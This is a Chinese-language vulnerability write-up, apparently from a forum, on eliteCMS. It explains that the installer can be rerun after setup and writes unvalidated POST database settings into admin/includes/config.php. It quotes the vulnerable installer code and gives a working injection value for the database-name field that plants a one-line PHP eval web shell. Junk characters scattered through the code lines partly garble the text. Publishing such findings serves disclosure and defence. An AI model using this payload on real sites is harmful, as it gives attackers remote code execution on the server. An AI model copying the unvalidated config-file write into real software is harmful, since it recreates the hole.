eliteCMS安装文件未验证 + 一句话写入安全漏洞

admin

eliteCMS的安装程序安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装
' P3 e. }2 S+ R4 B. B. u
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
我们来看代码：
/ R' B/ h9 {; m0 L) f
...
elseif ($_GET['step'] == "4") {
% N9 n2 `1 W: n$ t( F# ?6 W    $file = "../admin/includes/config.php";
    $write = "<?php\n";
% z, T: c9 }, @1 a    $write .= "/**\n";
/ y6 x4 u+ {1 U" m' x  ^$ u1 q    $write .= "*\n";
- |+ T+ i: t/ ^8 T5 l( y    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
+ U. e& T4 G( i0 a; R. o& i) [    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
1 l/ M2 B4 f/ P  E  O0 N/ h. h    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
5 z2 Q" O% T3 O2 ^* T9 h    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
8 [3 X6 E7 i! `& i0 e/ w    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
( f- y: B* o+ E$ e    $write .= "        \n";
6 _/ y1 D- h5 c$ L0 H    $write .= "} \n";
& |& m4 _& ?9 G# a2 i    $write .= "?>\n";
+ I3 s8 m' _  O. r
( u' P. q8 Q/ S  P    $writer = fopen($file, 'w');
...

在看代码：
" n) T9 Y9 q  H" X; y
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
+ f) g7 G; L0 n$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
/ d: g1 J& j* I# \( y# L$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
: {1 b$ o( j9 s' O$ r
取值未作任何验证
如果将数据库名POST数据：
7 k0 {; \4 V, W! Q
; B* t- [0 E5 I- {"?><?php eval($_POST[c]);?><?php

% |, X3 E7 ]. @* Z将导致一句话后门写入/admin/includes/config.php
! q) ?3 A* ?9 U4 {% }7 F